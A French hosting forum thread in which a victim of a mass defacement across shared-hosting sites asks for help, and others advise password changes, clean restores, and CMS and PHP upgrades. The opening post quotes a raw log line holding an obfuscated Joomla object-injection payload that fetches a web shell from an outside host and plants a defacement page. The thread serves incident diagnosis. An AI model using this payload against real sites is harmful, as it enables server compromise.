OVH Community, votre nouvel espace communautaire.

Hébergement mutualisé - Sites web piratés


Nowwhat
13/06/2016, 08h04
... . Y a-t-il moyen de vérifier les logs d'accès FTP ?
Bien sur.
Démarre google.fr et donne lui ceci "OVH log ftp".
Il va te filer https://www.ovh.com/fr/hosting/guide...gs_de_mon_site
Ce logs (dont l'accès FTP) sont importants.

Si il figure uniquement TES IP's, tu sauras que uniquement TES PC ont été utilisé pour modifier ton hébergement. Si, de plus, tes PC ne sont pas contaminé non plus, tu sauras pour de bon que le hackeur est passé par les failles de tes script PHP (et autre) pour upload son malheur.

ovniz
13/06/2016, 07h59
Vous avez tout vidé avant de mettre à jour ? Car une mise à jour des CMS ne bouche pas tous les trous créés.

=> accès mysql/ftp : oui, c'est tout à fait possible, même si ce n'est pas le plus courant.

=> les accès mysql sont en dur dans un fichier, si un pirate a pu entrer chez vous, il a pu aussi les récupérer.
=> accès FTP : il me semble qu'on les met dans un fichier conf de Joomla aussi, pour certaines fonctionnalités

Et puis, vous avez pu rapatrier un fichier vérolé chez vous, et vous faire piquer vos identifiants (messagerie, ovh et autres en plus)

Donc, pas sécurité, on se met en mode parano, et on change tout partout

chmod777
13/06/2016, 01h34
PHP 4.4 a des bugs et sans doute des problèmes de sécurité depuis le temps qu'il n'est plus mis à jour mais le problème est, je pense, beaucoup plus simple et classique : comme tu l'as dit, tes CMS n'étaient pas à jour (les nouvelles versions n'étaient sans doute pas compatibles avec PHP 4) offrant la possibilité d'exploiter des failles assez faciles.

Pour savoir comment détecter les fichiers infectés, je ne sais pas du tout mais c'est peut-être déjà une bonne nouvelle si OVH n'a pas suspendu ton hébergement (= peut-être pas de gros problèmes en vue).

IE-Lobbying
13/06/2016, 00h53
Hello,

Merci pour votre feedback.

Pour le moment, j'ai fait :
1. Mise à jour vers PHP 5.6
2. Mise à jour des CMS, plugins & thèmes

Pensez-vous vraiment que le pirate ait pu récupérer mes accès FTP, MySQL, ou autre ? Y a-t-il un moyen de le détecte ?

Un point important pour moi est surtout de comprendre comment le pirate a pu réussir son intrusion. Même si je penche pour une faille lié à l'environnement PHP, il pourrait s'agir d'une autre porte d'entrée.

Par ailleurs, y a-t-il un moyen d'auditer facilement son hébergement afin de vérifier quels fichiers pourraient être infectés ?

chmod777BIS
12/06/2016, 16h05
Si tous tes sites étaient sur du PHP4.4, je pense plutôt que le problème vient de CMS qui n'étaient pas à jour du fait que les versions récentes ne supportaient plus la version 4 de PHP (par exemple Wordpress).

ovniz
12/06/2016, 13h40
mettre mysqli est relativement rapide, même s'il faut modifier plusieurs petites choses.
passer en PDO est un peu plus long... mais c'est quand même des questions à se poser. PHP 7 est réputé plus rapide que php5, c'est bien aussi d'en profiter.

Et recoder ses sites ne peut pas faire de mal, souvent, on améliore sensiblement notre code, vieillissant, qui a reçu des ajouts parfois à l'arrache.
C'est certes du boulot.

Bon courage IE-Lobbying. Ne repartez pas sur du php4.

kingkurt
12/06/2016, 12h57
Citation Envoyé par Gaston_Phone
C'est sutout l'accès aux bases de données qui posent problème : mes commandes "mysql_xxx" ne sont plus autorisées.
Il faut passer par le mode PDO.

ou mysqli

Gaston_Phone
12/06/2016, 12h47
Citation Envoyé par buddy
Le problème de php 7 c'est qu'il est tellement récent que tous les CMS ne sont pas compatibles.
C'est sutout l'accès aux bases de données qui posent problème : mes commandes "mysql_xxx" ne sont plus autorisées.
Il faut poasser par le mode PDO.

buddy
12/06/2016, 11h36
Le problème de php 7 c'est qu'il est tellement récent que tous les CMS ne sont pas compatibles.

Gaston_Phone
12/06/2016, 11h28
Citation Envoyé par buddy
3 bis) passer sur une version de php récente 5.5 ou supérieure.
Voir la version PHP 7.0

buddy
12/06/2016, 11h19
Bonjour,

Si tu es sur du multisite/multidomaine un site piraté peut être à l'origine de tout

Donc
0) effacer tous les fichiers sur ton hébergement dès maintenant
1) changer tes mots de passe.
2) repartir sur des sauvegardes saines si tu n'en a pas c'est la tuile.. Mais tu peux repartir des CMS bruts télécharger sur les sites officiels
3) mettre à jour tous tes sites et plug-ins et désactiver les plus ins non mis à jour récemment.

3 bis) passer sur une version de php récente 5.5 ou supérieure.

IE-Lobbying
12/06/2016, 09h44
Bonjour,

En consultant les statistiques de traffic de mes différents sites web de mon hébergement mutualisé, j'ai constaté d'importantes anomalies (baisse subite des visites / pages vues, apparition de pages en erreur 404, etc.). Après vérification, j'ai rapidement constaté que l'ensemble de mes sites web - peu importe le CMS utilisé (WordPress, MediaWiki, Pligg, etc.) - avaient été piratés.

Voici un exemple : http://blogueur.be/

Par "piratage", j'entends le fait que le pirate - Mr.Kro0oz.305 - a téléchargé 2 fichiers (index.html & i.html) et parfois même effacé le fichier .htaccess sur chaque domaine. Peut-être a-t-il également téléchargé d'autres fichiers que je n'aurais pas détecté... Dans tous les cas, aucun domaine ou sous-domaine de mon hébergement mutualisé ne semble y avoir échappé.

D'où le fait que ma première hypothèse concernant cette intrusion est que mon accès FTP aurait été piraté. Ce qui pourrait expliqué cette intrusion systématique sur chaque domaine. Y a-t-il moyen de vérifier les logs d'accès FTP ?

Ma seconde hypothèse est que le pirate aurait exploité une faille commune à mes différents domaines. Etant donné que les CMS sont différents, je pencherais pour une faille liée à la version de PHP (4.4). En consultant mes logs web, j'ai en effet constaté une requête anormale sur l'ensemble de mes domaines, au même moment :

41.100.89.64 blogueur.be - [07/May/2016:22:19:42 +0200] "GET / HTTP/1.1" 200 1650 "-" "}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc"; O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0discon nectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5: {s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s: 8:"feed_url";s:1809:"eval(chr(102).chr(119).chr(11 4).chr(105).chr(116).chr(101).chr(40).chr(102).chr (111).chr(112).chr(101).chr(110).chr(40).chr(36).c hr(95).chr(83).chr(69).chr(82).chr(86).chr(69).chr (82).chr(91).chr(39).chr(68).chr(79).chr(67).chr(8 5).chr(77).chr(69).chr(78).chr(84).chr(95).chr(82) .chr(79).chr(79).chr(84).chr(39).chr(93).chr(46).c hr(39).chr(47).chr(105).chr(109).chr(97).chr(103). chr(101).chr(115).chr(47).chr(117).chr(115).chr(10 1).chr(114).chr(46).chr(112).chr(104).chr(112).chr (39).chr(44).chr(39).chr(119).chr(43).chr(39).chr( 41).chr(44).chr(102).chr(105).chr(108).chr(101).ch r(95).chr(103).chr(101).chr(116).chr(95).chr(99).c hr(111).chr(110).chr(116).chr(101).chr(110).chr(11 6).chr(115).chr(40).chr(39).chr(104).chr(116).chr( 116).chr(112).chr(58).chr(47).chr(47).chr(119).chr (119).chr(119).chr(46).chr(119).chr(48).chr(114).c hr(109).chr(115).chr(46).chr(99).chr(111).chr(109) .chr(47).chr(115).chr(104).chr(101).chr(108).chr(1 08).chr(47).chr(105).chr(114).chr(97).chr(110).chr (115).chr(104).chr(101).chr(108).chr(108).chr(46). chr(116).chr(120).chr(116).chr(39).chr(41).chr(41) .chr(59).chr(32).chr(102).chr(119).chr(114).chr(10 5).chr(116).chr(101).chr(40).chr(102).chr(111).chr (112).chr(101).chr(110).chr(40).chr(36).chr(95).ch r(83).chr(69).chr(82).chr(86).chr(69).chr(82).chr( 91).chr(39).chr(68).chr(79).chr(67).chr(85).chr(77 ).chr(69).chr(78).chr(84).chr(95).chr(82).chr(79). chr(79).chr(84).chr(39).chr(93).chr(46).chr(39).ch r(47).chr(110).chr(97).chr(115).chr(114).chr(111). chr(100).chr(122).chr(46).chr(104).chr(116).chr(10 9).chr(39).chr(44).chr(39).chr(119).chr(43).chr(39 ).chr(41).chr(44).chr(39).chr(72).chr(97).chr(99). chr(107).chr(101).chr(100).chr(32).chr(66).chr(121 ).chr(32).chr(78).chr(97).chr(115).chr(114).chr(11 1).chr(32).chr(100).chr(122).chr(39).chr(41).chr(5 9));JFactory::getConfig();exit";s:19:"cache_name_f unction";s:6:"assert";s:5:"cache";b:1;s:11:"cache_ class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"i nit";}}s:13:"\\0\\0\\0connection";b:1;}\xf0\xfd\xf d\xfd"

Devant l'ampleur des dégâts, je dois dire que je suis plutôt abbatu et je ne sais par quoi commencé... Si vous avez de l'expérience dans la résolution de ce type de cas, merci de m'aider.